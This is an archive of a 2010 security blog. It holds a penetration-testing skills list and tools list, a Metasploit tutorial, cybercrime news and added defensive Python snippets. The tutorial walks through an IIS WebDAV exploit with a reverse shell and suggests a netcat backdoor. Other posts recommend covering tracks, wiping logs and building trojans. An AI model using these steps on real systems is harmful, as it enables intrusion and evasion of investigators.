Sunday, December 12, 2010

Bluetooth testing

Thursday, December 2, 2010

Private Browsing: Not so private after all

The private browsing features in Internet Explorer, Firefox, Chrome and Safari are not as protective as they promise to be, according to new research.

Privacy modes are designed to protect a browser user from having their online activity tracked by websites or by other people who use the browser on the same computer. However, the way the features are set up means that traces of data can still be found even when the tools are used, according to researchers from Stanford and Carnegie Mellon universities.
The team developed methods to test browser privacy and gave details as to how they pieced together browsing histories. They focused on people with access to the PC after the browsing session, calling these people 'local attackers' in a paper that is due to be presented at the Usenix security conference (PDF) on Wednesday.

Local attackers can access the DNS resolution history in a cache on a machine that uses the latest versions of Internet Explorer (IE), Firefox, Chrome and Safari, enabling the intruder to reconstruct if and when a user visited a website, according to the researchers.
In addition, operating systems swap out browser memory pages during private and non-private browsing sessions, leaving traces of both types of sessions, they said. Other points of entry are browser add-ons (such as plug-ins) and extensions, which leave traces on the hard disk.

Here is a link to the full article over at ZDNet.Co.UK

Saturday, November 27, 2010

Ideal Skill Set For the Penetration Testing

Based on questions I’ve gotten over the years and specifically in class, I’ve decided that we need to address some basic skills that every penetration tester should have. While we can’t realistically expect everyone to have the exact same skill set, there are some commonalities.


1. Mastery of an operating system. I can’t stress enough how important this is. So many people want to become hackers or systems security experts without actually knowing the systems they’re supposed to be hacking or securing. It’s common knowledge that once you’re on a target/victim, you need to somewhat put on the hat of a sysadmin. After all, having root means nothing if you don’t know what to do with root. How can you cover your tracks if you don’t even know where you’ve left tracks? If you don’t know the OS in detail, how can you possibly know everywhere things are logged?


2. Good knowledge of networking and network protocols. Being able to list the OSI model DOES NOT qualify as knowing networking and network protocols. You must know TCP in and out. Not just that it stands for Transmission Control Protocol, but actually know the structure of the packet, know what’s in it, know how it works in detail. A good place to start is TCP/IP Illustrated by Richard Stevens (either edition works). Know the difference between TCP and UDP. Understand routing, and be able to describe in detail how a packet gets from one place to another. Know how DNS works, and know it in detail. Understand ARP, how it’s used, why it’s used. Understand DHCP. What’s the process for getting an automatic IP address? What happens when you plug in? What type of traffic does your NIC generate when it’s plugged in and tries to get an automatically assigned address? Is it layer 2 traffic? Layer 3 traffic?


3. If you don’t understand the things in item 2, then you can’t possibly understand how an ARP spoof or a MITM attack actually works. In short, how can you violate or manipulate a process if you don’t even know how the process works, or worse, you don’t even know the process exists! Which brings me to the next point. In general you should be curious as to how things work. I’ve evaluated some awesome products in the last 10 years, and honestly, after I see one work, the first thing that comes to my mind is “how does it work?”.


4. Learn some basic scripting. Start with something simple like VBScript or Bash. As a matter of fact, I’ll be posting a “Using Bash Scripts to Automate Recon” video tonight. So if you don’t have anywhere else to start, you can start there! Eventually you’ll want to graduate from scripting and start learning to actually code/program, or in short write basic software (hello world DOES NOT count).


5. Get yourself a basic firewall, and learn how to configure it to block/allow only what you want. Then practice defeating it. You can find cheap used routers and firewalls on eBay, or maybe ask your company for old ones. Start with simple ACLs on a router. Learn how to scan past them using basic IP spoofing and other simple techniques. There’s no better way to understand these concepts than to apply them. Once you’ve mastered this, you can move to a PIX or ASA and start the process over again. Start experimenting with trying to push Unicode through it, and other attacks. Spend time on this site and other places to find info on doing these things. Really the point is to learn to do them.


6. Know some forensics! This will only make you better at covering your tracks. The implications should be obvious.


7. Eventually learn a programming language, then learn a few more. Don’t go and buy a “How to program in C” book or anything like that. Figure out something you want to automate, or think of something simple you’d like to create. For example, a small port scanner. Grab a few other port scanners (like nmap), look at the source code, and see if you can figure any of it out. Then ask questions on forums and other places. Trust me, it’ll start off REALLY shaky, but just keep chugging away!


8. Have a desire and drive to learn new stuff. This is a must; it’s probably more important than everything else listed here. You need to be willing to put in some of your own time (time you’re not getting paid for) to really get a handle on things and stay up to date.


9. Learn a little about databases, and how they work. Go download MySQL and read some of the tutorials on how to create simple sample databases. I’m not saying you need to be a DB expert, but knowing the basic constructs helps.


10. Always be willing to interact and share your knowledge with like-minded professionals and other smart people. Some of the most amazing hackers I know have jobs like pizza delivery or janitorial work; one is a marketing exec, another is actually an MD. They do this strictly because they love to. And one thing I see in them all is their excitement and willingness to share what they’ve learned with people who actually care to listen and are interested in the same.
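Item 2 asks what actually goes over the wire when a NIC comes up, and which layer that traffic lives at. As an added example that is not part of the original post, the Python below decodes three hand-built frames (an ARP request, a DHCP DISCOVER, and a TCP SYN) just far enough to answer that: it walks the Ethernet, ARP, IPv4, UDP and TCP headers field by field with struct and reports the layer and the header contents. The frames, MAC addresses and IP addresses are constructed for the example, not captured traffic.

```python
"""Added example, not from the original post: decode constructed Ethernet frames
far enough to say whether they are layer 2 or layer 3 traffic and what the
headers hold. Standard library only."""
import struct

ETHERTYPE_IPV4 = 0x0800
ETHERTYPE_ARP = 0x0806
IPPROTO_TCP, IPPROTO_UDP = 6, 17


def mac_str(b):
    return ":".join(f"{x:02x}" for x in b)


def ip_str(b):
    return ".".join(str(x) for x in b)


# ---- decoders: each takes raw bytes and returns the fields the header defines
def parse_ethernet(frame):
    dst, src, ethertype = struct.unpack("!6s6sH", frame[:14])  # 14-byte Ethernet II header
    return {"dst": mac_str(dst), "src": mac_str(src), "ethertype": ethertype, "payload": frame[14:]}


def parse_arp(pkt):
    # hw type, proto type, hw len, proto len, opcode, sender MAC/IP, target MAC/IP
    _, _, _, _, op, sha, spa, _, tpa = struct.unpack("!HHBBH6s4s6s4s", pkt[:28])
    return {"op": {1: "request", 2: "reply"}.get(op, str(op)),
            "sender_mac": mac_str(sha), "sender_ip": ip_str(spa), "target_ip": ip_str(tpa)}


def parse_ipv4(pkt):
    vihl, _, total_len, _, _, ttl, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (vihl & 0x0F) * 4  # header length in bytes; IP options make it more than 20
    return {"src": ip_str(src), "dst": ip_str(dst), "ttl": ttl, "proto": proto,
            "payload": pkt[ihl:total_len]}


def parse_udp(seg):
    sport, dport, length, _ = struct.unpack("!HHHH", seg[:8])
    return {"sport": sport, "dport": dport, "payload": seg[8:length]}


def parse_tcp(seg):
    sport, dport, seq, ack, off_flags, window, _, _ = struct.unpack("!HHIIHHHH", seg[:20])
    flags = off_flags & 0x01FF  # low 9 bits are the flag bits, top 4 the data offset
    names = [n for bit, n in ((0x02, "SYN"), (0x10, "ACK"), (0x01, "FIN"),
                              (0x04, "RST"), (0x08, "PSH")) if flags & bit]
    return {"sport": sport, "dport": dport, "seq": seq, "ack": ack, "window": window,
            "flags": "|".join(names), "data": seg[(off_flags >> 12) * 4:]}


def classify(frame):
    """One-line description of what the frame is and at which layer it lives."""
    eth = parse_ethernet(frame)
    if eth["ethertype"] == ETHERTYPE_ARP:  # ARP carries no IP header: layer 2 only
        arp = parse_arp(eth["payload"])
        return f"L2 ARP {arp['op']}: who has {arp['target_ip']}? tell {arp['sender_ip']}"
    if eth["ethertype"] == ETHERTYPE_IPV4:
        ip = parse_ipv4(eth["payload"])
        if ip["proto"] == IPPROTO_UDP:
            udp = parse_udp(ip["payload"])
            if (udp["sport"], udp["dport"]) == (68, 67):  # DHCP client -> server ports
                return f"L3 DHCP client->server (UDP 68->67) from {ip['src']} to {ip['dst']}"
            return f"L3 UDP {ip['src']}:{udp['sport']} -> {ip['dst']}:{udp['dport']}"
        if ip["proto"] == IPPROTO_TCP:
            tcp = parse_tcp(ip["payload"])
            return f"L3 TCP {ip['src']}:{tcp['sport']} -> {ip['dst']}:{tcp['dport']} flags={tcp['flags']}"
    return f"unhandled ethertype 0x{eth['ethertype']:04x}"


# ---- constructed sample frames (hand-built with struct.pack, not captured traffic)
def ethernet(dst_hex, src_hex, ethertype, payload):
    return bytes.fromhex(dst_hex) + bytes.fromhex(src_hex) + struct.pack("!H", ethertype) + payload


def ipv4(src, dst, proto, payload):
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                      bytes(map(int, src.split("."))), bytes(map(int, dst.split("."))))
    return hdr + payload  # checksum left at 0: irrelevant for parsing


BROADCAST, CLIENT_MAC = "ffffffffffff", "000325134301"  # constructed MAC addresses
ARP_FRAME = ethernet(BROADCAST, CLIENT_MAC, ETHERTYPE_ARP, struct.pack(
    "!HHBBH6s4s6s4s", 1, ETHERTYPE_IPV4, 6, 4, 1, bytes.fromhex(CLIENT_MAC),
    bytes([192, 168, 1, 50]), b"\x00" * 6, bytes([192, 168, 1, 1])))

# A DHCPDISCOVER leaves before the host has any address: src 0.0.0.0, broadcast dst.
DHCP_BODY = struct.pack("!BBBB", 1, 1, 6, 0) + b"\x00" * 8  # op=BOOTREQUEST, truncated body
DHCP_FRAME = ethernet(BROADCAST, CLIENT_MAC, ETHERTYPE_IPV4, ipv4(
    "0.0.0.0", "255.255.255.255", IPPROTO_UDP,
    struct.pack("!HHHH", 68, 67, 8 + len(DHCP_BODY), 0) + DHCP_BODY))

TCP_FRAME = ethernet("00aa00aa00aa", CLIENT_MAC, ETHERTYPE_IPV4, ipv4(
    "10.0.0.5", "10.0.0.9", IPPROTO_TCP,
    struct.pack("!HHIIHHHH", 40000, 80, 1000, 0, (5 << 12) | 0x02, 65535, 0, 0)))

if __name__ == "__main__":
    for f in (ARP_FRAME, DHCP_FRAME, TCP_FRAME):
        print(classify(f))
```

The point of the three frames is the answer to the question in item 2: the ARP request never gets an IP header (layer 2, broadcast to ff:ff:ff:ff:ff:ff), while the DHCP DISCOVER is already IP/UDP (layer 3) even though the host has no address yet, which is why its source is 0.0.0.0 and its destination is the limited broadcast. Feed real bytes from a capture into classify() and the same decoders apply.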


Reference: www.google.com

Jose Penetration Tools List

Let me just say that I’m subject to use Backtrack in any phase.

Phase 1 Passive Reconnaissance

1. Google (1st stop for passive recon), facebook, myspace, linkedin etc. (Find info on individuals)
2. Netcraft (find passive info about web servers)
3. Whois
4. Geo Spider
5. Google Earth
6. HTTrack
7. Webripper
8. Wireshark (I use in almost every phase. I wanna see if their website is sending me any tracking goodies while I’m reconning it.)
9. Paros (Same as above, plus I use it to study authentication methods, and other stuff on their sites)

Phase 2 Scanning

1. Nmap
2. Firewalk
3. Hping
4. Modem Scan
5. THC Scan
6. Tone Loc
7. p0f
8. Solarwinds
9. TCPTraceroute

Phase 3 Vulnerability Research

1. (I pretty much go manual here, but there’s always Nessus, ISS and others).
2. I usually try and build something that looks as close as possible to my target, and practice exploiting them. I count this as part of my vulnerability research.
3. Places I check are Secunia, Seclist, Milw0rm, Eeye, Metasploit.com, Securiteam, and a few others.
4. Vendor websites.

Phase 4 Penetration/Hacking

Breaking in

1. Manual exploit code
2. Metasploit
3. Core Impact (large scale: 5000 or more nodes to penetrate)

Password Cracking

1. Kerb Crack
2. Pwdump
3. Cain & Abel
4. John the Ripper
5. Rainbow Crack
6. Hydra

Trojans & Rootkit

1. I usually make my own. But some good POC ones are Poison Ivy, Nuclear RAT, Netbus.

Phase 5 Going Deeper

1. Dsniff
2. Tcpdump
3. Arpspoof
4. Putty
5. Recub
6. Scapy (to trick devices and anything else which accepts or sends packets)
7. WebScarab (studying HTTPS and other secure authentication processes)
8. IDA Pro (reversing any custom apps I find being used internally).
9. OllyDbg (same as above).
10. Yersinia (VLAN hopping, and other low stack level attacks)

Phase 6 Covering Tracks

1. RM, delete, erase, etc (obviously).
2. Clearlogs
3. Wipe utility
4. ADS
5. Winzapper (not a big fan, but when I have to…..)

Wednesday, November 17, 2010

Metasploit Tutorial

How tough is it to really compromise a system? As an ethical hacking instructor, that is a question that I get asked quite frequently. My usual response to this type of question is to encourage the questioner to try to compromise a system which they own, to find out the time and skill necessary to compromise a system. There is real value in getting a true sense of what it really takes to actually defeat common security measures. This provides first-hand experience that cannot really be duplicated from listening to an industry expert or from reading articles and books. The main reason for this is that there is a lot of misinformation, some intentional and some not, available. The easiest way to determine just how difficult something like compromising systems or defeating wireless encryption is, is to try it for yourself.
Most security professionals are aware that attacking and penetrating network devices is getting easier and attacks are getting more sophisticated. In large part this phenomenon is due to the old adage of "standing on the shoulders of giants." Many system researchers uncovered security weaknesses in common system design years ago, and as security professionals they shared the information. This allows someone with little understanding of system architecture to perform more complex attacks than ever thought possible.
For a security professional it is possible to compromise a system without spending months learning a programming language and years learning system architecture. We can actually use technology to assist in performing system penetration. Products like Core Security's Core Impact and Immunity's Canvas (see the post Hacking with Exploit Frameworks) have been providing this type of functionality for a few years now. These manufacturers do not just provide the technology; they also provide training and support for their products to allow a qualified professional to perform a more methodical penetration test. It makes the task of compromising a system easier for a security administrator.
The previously mentioned utilities are both fee-based products, but more recently an open source product has become a common sight in penetration testing kits. This utility is called Metasploit™. Both Windows and Linux users can take advantage of the Metasploit™ product to perform a penetration test or system compromise. The utility itself is written in many programming languages including Perl, C, and assembler.
This environment provides many ready-to-use exploits and also allows the security tester to customize them or to create their own exploit. The basic process for using the Metasploit™ console is not the most intuitive, but I think this was done to discourage the least skilled script kiddies from attempting to penetrate a system using this specific utility. The basic format for exploiting the system is as follows:

1. Pick which exploit to use
2. Configure the exploit with remote IP address and remote port number
3. Pick a payload
4. Configure the payload with local IP address and local port number
5. Execute the exploit

While this process is much more difficult than a "point and click" utility, it should not take more than an hour or so to get a good feel for the overall process. Perhaps the easiest mechanism for using the Metasploit™ utility is to take advantage of a bootable "Live CD" such as Whoppix or Auditor.
Many experts believe that understanding how to compromise a system is knowledge that should not be shared, and that utilities such as Metasploit™, Canvas, and Core Impact make it easier for systems to be compromised or exploit code to be developed. To a certain point it cannot be argued that these utilities make the process easier, but there has not been a major increase in the amount of exploit code available since the release of these tools. Also remember that the security hole is not in the fact that exploit code exists that allows an attacker to penetrate a system; the hole is in the fact that the underlying vulnerability exists in the first place.
It is also worthy of note that most system attackers already have the necessary knowledge of how to compromise systems or how to develop exploit code. These utilities give the security administrator the opportunity to test their own systems for security weaknesses before an attacker discovers them, and in a way this begins to level the playing field for the security administration staff. In fact these types of utilities may eventually become common practice for system developers to use while writing the application, and this may stop the vulnerability from ever being published in the first place.
I encourage you to find some time to sit down and download a "Live CD" distribution, fire it up, and check out one of the utilities mentioned above, so that if someone ever mentions the difficulty involved in compromising a system you will know exactly what it really takes.
Example of Using Metasploit™
The goal of the exercise below is to become familiar with the Metasploit™ framework and to perform a compromise of a Windows 2000 system. These steps can be done easily from most popular bootable CD Linux distributions. The steps below are for use with the Whoppix/Whax distro (http://ftp.belnet.be/linux/whoppix/). I understand that some people prefer the web interface for using Metasploit™, but from our extensive testing we have found the good old command line to be more reliable.
To begin, boot to your CD and pull up a shell window. From there you will need to move to the Metasploit™ directory. To do this from a command prompt type:
cd /KNOPPIX/pentest/exploits/framework-2.3/
Launch the Metasploit™ console. To do this, from a command line type the following:
./msfconsole
Pick which exploit to use
Once the msfconsole is running, it is time to decide which exploit to attempt against the target system. Your options here stem from the following commands:

* use
* show
* info

The use command will tell the utility exactly which exploit to select. The show command will do nothing on its own, but can be combined with exploits or payloads as shown in the examples below. The info command provides details about a specific module.
Start by entering "show exploits" to see the list of exploits available. Pretty impressive, huh? Many of the exploits listed here are going to work against the target servers and in fact we use many of these exploits in the ethical hacking course.
If you need some hints, I recommend starting with the "iis50_webdav_ntdll" exploit.
To actually start the exploit type "use iis50_webdav_ntdll"
After use – configure options
We’ve selected our exploit, but we are not done yet. We need to set options. These options include the destination IP and the destination port. The options are configured by using the set command. The show advanced command will let you know if there are more options that can be set. Most exploits do not have advanced options.
Start by typing "show options"
This will show you the command requirements to run the exploit.
These include the RHOST (This is the host that we are going to compromise) and the RPORT (this is the port that the vulnerable function is running on)
To set these options type "set RHOST " and press enter. On the next line type "set RPORT 80"
Is the exploit going to work?
We have a system, we have an exploit. Are we going to be able to compromise the system? Now is the time to find out.
To perform the check type "check".
This may not work on all exploits. This will see if the server or target appears vulnerable.
For some exploits you might have to provide information about what type of system to compromise. With the attack listed above this is not necessary. If you want to know why this is important sign-up for the ethical hacking courses. Here are steps if you use an exploit that requires you to select a target.
If your check is unsuccessful, you may need to select some additional options about the target that you are hoping to compromise. This usually includes a description of the OS and the service pack level of the system. In some modules there is a brute force option. What is being configured here is the memory offset that the utility will use to find the vulnerable function. The brute force option will try many memory offsets, but the result will be a lot less stealthy if you are unsuccessful. If you enter "show targets" you should see something like the below.
msf iis50_webdav_ntdll > show targets

Supported Exploit Targets
=========================

   0  Windows 2000 Bruteforce
What do we want a successful attack to do?
What Metasploit™ calls a payload, many others refer to as shell code or opcode. This is the code that we wish to have inserted directly into the buffer that we are overflowing. In most cases the shell code is going to be service pack dependent, OS dependent, and architecture (i386) dependent as well. This means that most of the payloads in the Metasploit™ framework will work only for certain OSes and on certain processors. Even if you select an appropriate payload you will have to configure options to get the payload to work. The most frequently used type of shell code is code that generates a reverse shell from the compromised system back to the attacking system. The commands described in the exploits section (use, show, info) also apply to payloads. If you type "show payloads" you should see a response like the below.
msf iis50_webdav_ntdll > show payloads

Metasploit Framework Usable Payloads
====================================

  win32_bind                  Windows Bind Shell
  win32_bind_dllinject        Windows Bind DLL Inject
  win32_bind_meterpreter      Windows Bind Meterpreter DLL Inject
  win32_bind_stg              Windows Staged Bind Shell
  win32_bind_stg_upexec       Windows Staged Bind Upload/Execute
  win32_bind_vncinject        Windows Bind VNC Server DLL Inject
  win32_exec                  Windows Execute Command
  win32_reverse               Windows Reverse Shell
  win32_reverse_dllinject     Windows Reverse DLL Inject
  win32_reverse_meterpreter   Windows Reverse Meterpreter DLL Inject
  win32_reverse_stg           Windows Staged Reverse Shell
  win32_reverse_stg_upexec    Windows Staged Reverse Upload/Execute
  win32_reverse_vncinject     Windows Reverse VNC Server Inject
In this case the best shell to try will be the win32_reverse payload. To do this type "set PAYLOAD win32_reverse"
This payload requires some options. These include the exit function, the local host and the local port.
To see these options type "show options" you should see something like the below:
msf iis50_webdav_ntdll(win32_reverse) > show options

Exploit and Payload Options
===========================

  Exploit:    Name      Default      Description
  --------    ------    -----------  ------------------
  optional    SSL                    Use SSL
  required    RHOST     67.36.70.19  The target address
  required    RPORT     80           The target port

  Payload:    Name      Default   Description
  --------    --------  -------   ------------------------------------------
  required    EXITFUNC  seh       Exit technique: "process", "thread", "seh"
  required    LHOST               Local address to receive connection
  required    LPORT     4321      Local port to receive connection

  Target: Windows 2000 Bruteforce
To set the missing options, we will use the set command like above. Before we can set these values we need to know what they are. To find your local IP address open another shell window, by either right clicking on the desktop or (if your CD has this option) look for the computer icon in the program bar. If you right click on the desktop look for the shell option. If you do this step right you should see a new shell box (kinda sorta like a DOS command prompt box on XP) appear.
Once you have the box open type "ifconfig". This will show the information for all of the interfaces on your Linux system. This is the equivalent of the ipconfig command in Windows. You should see something like the following:
[root@localhost ~]# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:03:25:13:43:F2
          inet addr:10.5.14.173  Bcast:10.5.15.255  Mask:255.255.252.0
          inet6 addr: fe80::203:25ff:fe13:43f2/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:4563 errors:0 dropped:0 overruns:0 frame:0
          TX packets:2905 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:3696580 (3.5 MiB)  TX bytes:325618 (317.9 KiB)
          Interrupt:193 Base address:0x4c00

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:213 errors:0 dropped:0 overruns:0 frame:0
          TX packets:213 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:49707 (48.5 KiB)  TX bytes:49707 (48.5 KiB)
What we are interested in is the value for eth0 (or whatever is active on your system; it could be eth1 or some other interface). You should see the label inet addr: with your IP address listed next to it. In the example above the IP address is 10.5.14.173. If you look closely you'll see that it is there. Go ahead and look – no one will laugh, I promise.
Once we know this value we will set it with the set command. To do this type "set LHOST ". This is all that really needs to be set, but for luck I always make one more change – I set the local port to 5555. This is just for superstition. I'm not going to give you exact instructions on how to do this, but if you can figure it out – be my guest and change it.
This payload with this exploit had no advanced options, but to check for other exploits type "show advanced". You should see something like the below.
msf iis50_webdav_ntdll(win32_reverse) > show advanced

Exploit and Payload Options
===========================

  Exploit (Msf::Exploit::iis50_webdav_ntdll):
  -------------------------------------------

  Payload (Msf::Payload::win32_reverse):
  --------------------------------------
Making it all happen
Now is the time to see the fruits of your labor. This next phase will actually compromise the system if you have done everything correctly and the system is vulnerable. If all goes well you will own the box.
To do this type "exploit"
Once you launch the exploit it may take some time. The exploit is trying to brute force the memory offset for the vulnerable function. If you don't know what this means and want to learn – see the ethical hacking class as listed above.
If you've done everything right you should see something like the below.
[*] Starting Reverse Handler.
[*] Connecting to web server. OK
[*] Trying return address 0x004e004f...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00420041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00430041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00c10041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00c30041...
[*] Sending request (65739 bytes)
[*] Connecting to web server. OK
[*] Trying return address 0x00c90041...
[*] Sending request (65739 bytes)
If you are successful you'll have a remote connection into the target machine and can do whatever you want. Once you've done this and received the prompt for the other system you "own the box". I won't tell you what to do next; after all, where is the fun in that? Don't trash the system too badly if you want to exploit it again. You might want to try to crack the passwords, or you can create your own netcat backdoor.
Metasploit™ – available from http://www.metasploit.com
It is not essential that the user boot a Linux CD. To try out the framework on a Windows system, the Metasploit Project does provide a Windows installer on their web site.
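The five-step procedure above (pick exploit, set RHOST/RPORT, pick payload, set LHOST/LPORT, exploit) has a server-side footprint: each return address the framework tries produces another oversized request to the same web server from the same client, visible in the console output as repeated "Sending request (65739 bytes)" lines. As an added example that is not part of the original tutorial, the Python below reads constructed IIS W3C log lines and raises one alert per client that sends a burst of very large requests. The log lines, the 60000-byte threshold and the three-in-sixty-seconds rule are assumptions chosen for the example; the client address reuses the LHOST from the walkthrough.

```python
"""Added example, not from the original tutorial: flag a burst of oversized
requests from one client in IIS W3C logs (the server-side view of the
return-address brute force shown in the console output above)."""
from collections import defaultdict
from datetime import datetime, timedelta

# Assumptions for the example: a normal request is far below 60000 bytes, and
# three such requests from one client inside a minute are worth an analyst's time.
LARGE_REQUEST_BYTES = 60000
BURST_COUNT = 3
BURST_WINDOW = timedelta(seconds=60)

# Constructed sample in IIS W3C extended format; not a real capture. 198.51.100.7
# sends a single large (but legitimate-looking) upload and must not be alerted on.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Version: 1.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status cs-bytes
2010-11-17 10:00:01 192.0.2.10 GET /default.htm 200 312
2010-11-17 10:00:02 192.0.2.10 GET /images/logo.gif 200 290
2010-11-17 10:00:05 198.51.100.7 POST /upload.asp 200 71000
2010-11-17 10:00:09 10.5.14.173 SEARCH /AAAA 500 65739
2010-11-17 10:00:11 10.5.14.173 SEARCH /AAAA 500 65739
2010-11-17 10:00:14 10.5.14.173 SEARCH /AAAA 500 65739
2010-11-17 10:00:17 10.5.14.173 SEARCH /AAAA 500 65739
2010-11-17 10:00:30 192.0.2.10 GET /default.htm 200 312
"""


def parse_w3c(text):
    """Map each data line onto the column names given by the #Fields directive."""
    fields, rows = None, []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        values = line.split()
        if fields is None or len(values) != len(fields):
            continue  # cannot map this line onto a known header; skip it
        rows.append(dict(zip(fields, values)))
    return rows


def find_bursts(rows, threshold=LARGE_REQUEST_BYTES, count=BURST_COUNT, window=BURST_WINDOW):
    """Return one alert per client that sent `count` or more requests of at least
    `threshold` bytes within `window`."""
    large = defaultdict(list)
    for r in rows:
        if int(r["cs-bytes"]) >= threshold:
            ts = datetime.strptime(f"{r['date']} {r['time']}", "%Y-%m-%d %H:%M:%S")
            large[r["c-ip"]].append(ts)
    alerts = []
    for client, times in large.items():
        times.sort()
        for i, start in enumerate(times):
            # slide a window forward from each large request
            in_window = [t for t in times[i:] if t - start <= window]
            if len(in_window) >= count:
                alerts.append({"c-ip": client, "first": start, "last": in_window[-1],
                               "count": len(in_window)})
                break  # one alert per client is enough for the analyst
    return alerts


if __name__ == "__main__":
    for alert in find_bursts(parse_w3c(SAMPLE_LOG)):
        print(f"{alert['c-ip']}: {alert['count']} oversized requests "
              f"between {alert['first']:%H:%M:%S} and {alert['last']:%H:%M:%S}")
```

The single large POST is deliberately left unflagged: size alone is a weak signal, and it is the repetition against the same host that distinguishes an offset brute force from an upload. On a production server the sc-status and cs-method columns give further context (a WebDAV method on a server that was never meant to serve WebDAV, or a burst of 500s), and the same parser can be pointed at them.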

Saturday, November 13, 2010

Cops say lost mobile phones can be easily recovered if police complaint is filed

CHENNAI : Most people who lose their mobile phone do not file a police complaint as they believe the chances of recovering their phone are minimal. However, according to the Chennai suburban police, it is almost certain that you would get back your phone if you file a police complaint with the International Mobile Equipment Identity (IMEI) number.

Suburban Police Commissioner S R Jangid said that on an average, about 150 mobile phones are either stolen or lost in Chennai or its suburbs everyday. In 2009 the police managed to recover 35 mobile phones valued at Rs. 3.25 lakh while this year till date 102 phones worth nearly Rs. 7 lakh have been recovered.

"We have had the support of service providers in locating stolen or lost cell phones without which it is very difficult to track lost phones," he said. "This is among other public services we focus on and our team has done a great job in tracking these devices'' Jangid added. The police commissioner urged people to call 9042400100 to report their missing mobile phones.

Of the 150 mobile phones lost daily, police said that about 50 instruments were stolen by pickpockets, about 30 snatched, and the remaining misplaced. A sizable number of complaints were received from bus passengers in the city suburbs, he added.

Those lodging complaints should furnish complete information including their name and address, model and make of the lost instrument, its number, e-mail address, date of loss and IMEI number. The IMEI number can be obtained by typing *#06# on a GSM mobile phone. The number can also be found beneath the battery. (The IMEI number is a unique code encrypted on each genuine mobile phone that can help police track it anywhere in the country even if the SIM card is changed. Whenever a cell phone logs onto a network to make or receive calls, its IMEI number is emitted and gets registered.)
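A complaint is only as useful as the IMEI written on it, and a 15-digit number copied from a sticker under the battery is easy to mistype. As an added example that is not from the article, the Python below validates an IMEI before it is recorded: the 15th digit is a Luhn check digit over the first 14 (the 8-digit TAC and 6-digit serial), so a single wrong digit almost always fails the check. The sample values are constructed for the example.

```python
"""Added example, not from the article: check the Luhn digit of an IMEI so a
typo is caught before the number goes into a complaint."""


def luhn_check_digit(digits14: str) -> int:
    """Luhn check digit for a 14-digit string: double every second digit from
    the right (starting with the rightmost), subtract 9 from doubled values
    over 9, sum, and pick the digit that makes the total a multiple of 10."""
    total = 0
    for i, ch in enumerate(reversed(digits14)):
        d = int(ch)
        if i % 2 == 0:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return (10 - total % 10) % 10


def normalize_imei(raw: str) -> str:
    """Drop the dashes and spaces people write between IMEI groups."""
    return "".join(c for c in raw if c.isdigit())


def is_valid_imei(raw: str) -> bool:
    imei = normalize_imei(raw)
    if len(imei) != 15:
        return False  # IMEISV is 16 digits and has no check digit; not handled here
    return luhn_check_digit(imei[:14]) == int(imei[14])


def imei_parts(raw: str) -> dict:
    """Split a valid IMEI into TAC (8), serial (6) and check digit (1)."""
    imei = normalize_imei(raw)
    if not is_valid_imei(imei):
        raise ValueError(f"not a valid IMEI: {raw!r}")
    return {"tac": imei[:8], "serial": imei[8:14], "check": imei[14]}


if __name__ == "__main__":
    # Constructed sample values: a valid IMEI and the same one with a typo.
    for candidate in ("49-015420-323751-8", "49-015420-323751-7"):
        print(candidate, "valid" if is_valid_imei(candidate) else "INVALID")
```

The check is a format check only: it tells the complainant the number was copied correctly, not that the handset is genuine. The TAC identifies the make and model, which should agree with the "model and make" field the police ask for.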

Read more: Cops say lost mobile phones can be easily recovered if police complaint is filed - The Times of India http://timesofindia.indiatimes.com/city/chennai/Cops-say-lost-mobile-phones-can-be-easily-recovered-if-police-complaint-is-filed/articleshow/6916445.cms#ixzz159jZmI9s

Friday, November 12, 2010

The state of cyber crime awareness amongst the law enforcement agencies

In an instance of a cyber crime investigation in India, a police officer was asked to seize the computer of the hacker. What he brought from the hacker’s premise was his monitor. In another similar instance, the police officials seized the memory and the CD-ROM drive of a hacker’s computer instead of taking out the hard disk.

If that doesn’t explain the state of cyber crime awareness amongst the law enforcement agencies, try reporting a cyber crime and most likely you will never think of contacting the police again for such an instance.

Today’s cyber attacks are not undertaken by amateur hackers who create viruses or malware to prove their worth or to showcase the vulnerabilities of government systems. There is a new economy emerging around cyber crime, which is sophisticated and organized.

In its Cybercrime Intelligence Report of 2009, Finjan shows the operations of the Golden Cash network consisting of an entire trading platform of malware-infested PCs. The trading platform utilizes all necessary components (buyer side, seller side, attack toolkit, and distribution via “partners”). This advanced trading platform marks a new milestone in the evolution of cyber crime.

By turning compromised PCs from a one-time source of profit into a digital asset that can be bought and sold again and again, cybercriminals are maximizing their illegal gains.

Another report from Symantec on the ‘Underground Economy’, highlights the kind of money these cyber criminals make. According to the report, Script (a well-known figure in the underground economy) and his associates were known for mass-producing counterfeit credit and debit cards, which they delivered internationally and used to withdraw cash.

This was so efficient that, at one point, those working with Script were reportedly earning up to $100,000 a day—significantly more than estimates of earnings on US-based forums. Script was arrested by Russian authorities in 2005.

Trends in cyber crime
The last few weeks have seen cyber attacks being carried out on many countries. Just a couple of weeks ago, it was reported that a widespread and unusual computer attack was launched on Web sites of several government agencies in the United States, including some that are responsible for fighting cyber crime as well.

In addition, the last few days saw the Web sites of major South Korean government agencies, banks and Internet sites being paralyzed in a suspected cyber attack as well.

